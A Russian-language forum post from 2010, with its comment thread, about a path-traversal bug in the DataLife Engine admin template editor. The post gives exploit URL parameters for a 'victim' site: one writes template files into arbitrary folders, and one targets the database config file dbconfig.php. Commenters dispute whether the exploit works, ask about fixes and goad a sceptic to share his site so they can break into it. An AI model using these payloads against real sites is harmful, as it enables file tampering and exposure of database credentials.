dle.in.ua » Баги » Баг - прямой вызов файлов и мусор в папках

Баг - прямой вызов файлов и мусор в папках

Автор: Lion__ от 9-06-2010, 02:42
Данный баг позволяет производить прямой запуск файлов и мусорить в папках

DLE уязвимость работает на версиях: ВСЕ DLE

Уровень риска: Низкая (На данный момент, работает только если у пользователя есть права администратора)

Нашёл очередной баг: Lion__

Переходим по ссылке:
http://жертва/admin.php?mod=templates

Получаем юрл с хешем, дописываем в ссылку:

Если вам надо расплодить файлы шаблона в нужную папку (например в root):
&action=dosavetemplates&edit_main=Bag_By_Lion__&do_template=..\


Прямой запуск файлов (пример запуска dbconfig.php):
&action=dosavetemplates&do_template=..\engine/data/dbconfig.phP -a=


Внимание: Второй способ не тестировался, но должен работать, защиту вроде обходит
  • Группа: r00t Admin
  • Icq: 5160909
  • Комментариев: 137
  • Публикаций: 74
  • Да и будет только так работать при админе.. сам себе будеш что-ли мусорить??

    зы второй не пашет

    --------------------
    • DImkA
    • Регистрация: 11.12.2007
    • Репутация: (2|2|0)
    • 9 июня 2010 13:43
    • 1
    ^
  • Группа: Гости
  • Icq: --
  • Комментариев: 0
  • Публикаций: 0
  • зы второй не пашет
    Тогда пользоваться надо вторым багом тот что новостью выше, там напрямую вызывается
    • Lion__
    • Регистрация: --
    • Репутация: (||)
    • 9 июня 2010 13:49
    • 2
    ^
  • Группа: User
  • Icq: --
  • Комментариев: 24
  • Публикаций: 3
  • 1) не пашет
    2) пашет bm
    • sergey_479
    • Регистрация: 25.10.2009
    • Репутация: (0|0|0)
    • 9 июня 2010 14:13
    • 3
    ^
  • Группа: User
  • Icq: --
  • Комментариев: 30
  • Публикаций: 1
  • Переходим по ссылке:
    http://жертва/admin.php?mod=templates

    ну так для того и меняется название admin.php на любое другое в админке. А если ты сам админ, то нафиКК это надо???
    • acelote
    • Регистрация: 25.03.2009
    • Репутация: (2|1|-1)
    • 9 июня 2010 15:52
    • 4
    ^
  • Группа: Модератор
  • Icq: --
  • Комментариев: 81
  • Публикаций: 10
  • Как исправить?

    --------------------
    • NoSay
    • Регистрация: 11.11.2009
    • Репутация: (2|2|0)
    • 9 июня 2010 19:44
    • 5
    ^
  • Группа: User
  • Icq: --
  • Комментариев: 64
  • Публикаций: 20
  • первый способ тоже работает)
    &action=dosavetemplates&edit_main=Bag_By_Lion__&do_template=..\

    где Bag_By_Lion__ это название вашего шаблона

    эти все баги не будут работать если не ставить на папку templates права 777

    или отключить функцию fopen smile

    --------------------
    • nugumanov
    • Регистрация: 9.02.2009
    • Репутация: (0|0|0)
    • 9 июня 2010 19:51
    • 6
    ^
  • Группа: Гости
  • Icq: --
  • Комментариев: 0
  • Публикаций: 0
  • где Bag_By_Lion__ это название вашего шаблона

    Нет, это внутренность шаблона, в данном случае main.tpl

    Если отключить fopen То много чего не будет работать)
    • Lion__
    • Регистрация: --
    • Репутация: (||)
    • 9 июня 2010 20:33
    • 7
    ^
  • Группа: User
  • Icq: --
  • Комментариев: 253
  • Публикаций: 9
  • А у меня на сервере даже шеллы бесполезны, вот полюбуйтесь, товарисчи: http://ru-ua.ws/engine.php
    • pav
    • Регистрация: 18.01.2009
    • Репутация: (0|0|0)
    • 11 июня 2010 01:27
    • 8
    ^
  • Группа: Гости
  • Icq: --
  • Комментариев: 0
  • Публикаций: 0
  • BlackSmoke
    Да ты крут...
    • Lion__
    • Регистрация: --
    • Репутация: (||)
    • 11 июня 2010 01:54
    • 9
    ^
  • Группа: User
  • Icq: --
  • Комментариев: 253
  • Публикаций: 9
  • А то wink
    • pav
    • Регистрация: 18.01.2009
    • Репутация: (0|0|0)
    • 11 июня 2010 11:43
    • 10
    ^
  • Группа: User
  • Icq: 973508
  • Комментариев: 5
  • Публикаций: 0
  • Эта хрень работает только на Денвере. На реальном, нормально настроенном, сервере нет
    • fideral
    • Регистрация: 12.06.2010
    • Репутация: (0|0|0)
    • 12 июня 2010 22:45
    • 11
    ^
  • Группа: Гости
  • Icq: 767792
  • Комментариев: 414
  • Публикаций: 19
  • fideral,
    дай линк на свой сайт, а?
    ^
  • Группа: Гости
  • Icq: --
  • Комментариев: 0
  • Публикаций: 0
  • Как исправить данный фикс ?
    • wp_
    • Регистрация: --
    • Репутация: (||)
    • 13 июня 2010 03:19
    • 13
    ^
  • Группа: Гости
  • Icq: --
  • Комментариев: 0
  • Публикаций: 0
  • fideral
    Она везде реботает, дай злому линк wink
    • Lion__
    • Регистрация: --
    • Репутация: (||)
    • 13 июня 2010 16:52
    • 14
    ^
  • Группа: User
  • Icq: --
  • Комментариев: 253
  • Публикаций: 9
  • Вот полезли-то плодить дыры wink
    Я найду много других дел с правами администратора, чем мусорить в папках wink
    • pav
    • Регистрация: 18.01.2009
    • Репутация: (0|0|0)
    • 13 июня 2010 17:23
    • 15
    ^
  • Группа: User
  • Icq: 973508
  • Комментариев: 5
  • Публикаций: 0
  • to ZLoY Волосатый Торт
    А смысл? Потренироваться во взломе? Админских прав я тебе все равно не дам. К тому же у меня лицуха и дыр на порядок меньше
    • fideral
    • Регистрация: 12.06.2010
    • Репутация: (0|0|0)
    • 13 июня 2010 19:06
    • 16
    ^
  • Группа: User
  • Icq: --
  • Комментариев: 7
  • Публикаций: 0
  • fideral,
    ты дай ему линк, и админские права будет раздавать он boyan
    • tireks
    • Регистрация: 18.08.2009
    • Репутация: (0|0|0)
    • 13 июня 2010 20:17
    • 17
    ^
  • Группа: Гости
  • Icq: 767792
  • Комментариев: 414
  • Публикаций: 19
  • Цитата: fideral
    А смысл? Потренироваться во взломе? Админских прав я тебе все равно не дам. К тому же у меня лицуха и дыр на порядок меньше

    ты линк дай, а длее дело за мной :D
    ^
  • Группа: Гости
  • Icq: --
  • Комментариев: 0
  • Публикаций: 0
  • fideral,
    Оо какой ты умный... Тогда скажи хоть 1 дыру которая есть в нулле, но нет в офф версии?? Или хотя бы скажи чем отличается нулл от лицензии в данном случае, если конечно это знаешь
    • Lion__
    • Регистрация: --
    • Репутация: (||)
    • 13 июня 2010 21:41
    • 19
    ^
  • Группа: User
  • Icq: 973508
  • Комментариев: 5
  • Публикаций: 0
  • Смешные вы ребята однако. Линк давать не собираюсь ибо не все дыры знаю. Во многих нуллах есть бэкдоры оставленные нуллерами. Сам с ломанного двигла начинал и сейчас есть один сайт для экспериментов.
    • fideral
    • Регистрация: 12.06.2010
    • Репутация: (0|0|0)
    • 13 июня 2010 23:24
    • 20
    ^
  • Группа: Гости
  • Icq: --
  • Комментариев: 0
  • Публикаций: 0
  • все так начинали ))
    • asalex
    • Регистрация: --
    • Репутация: (||)
    • 15 июня 2010 10:06
    • 21
    ^
    Информация
    Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.